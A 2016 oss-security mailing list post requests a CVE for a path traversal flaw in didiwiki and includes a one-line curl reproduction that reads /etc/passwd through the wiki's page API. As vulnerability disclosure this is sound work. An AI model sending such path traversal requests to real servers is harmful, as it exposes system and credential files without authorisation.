Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Thu, 18 Feb 2016 18:02:21 -0500
From: Ignace Mouzannar <mouzannar@...il.com>
To: oss-security@...ts.openwall.com
Cc: security@...ian.org, Alexander Izmailov <yarolig@...il.com>
Subject: CVE request: didiwiki path traversal vulnerability

Hello,

Please can I have a CVE assigned to the following vulnerability?

- Versions Affected: all versions of didiwiki
- Bug discovered by: Alexander Izmailov
- Patch Available: https://github.com/OpenedHand/didiwiki/pull/1/files
- Patch provided by: Alexander Izmailov
- Description:

Allows a user to access any file on the filesystem from the browser.
To reproduce it, on Debian:
----
apt-get install didiwiki

curl http://localhost:8000/api/page/get?page=/etc/passwd
----

Thank you for your help.

 Ignace M

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.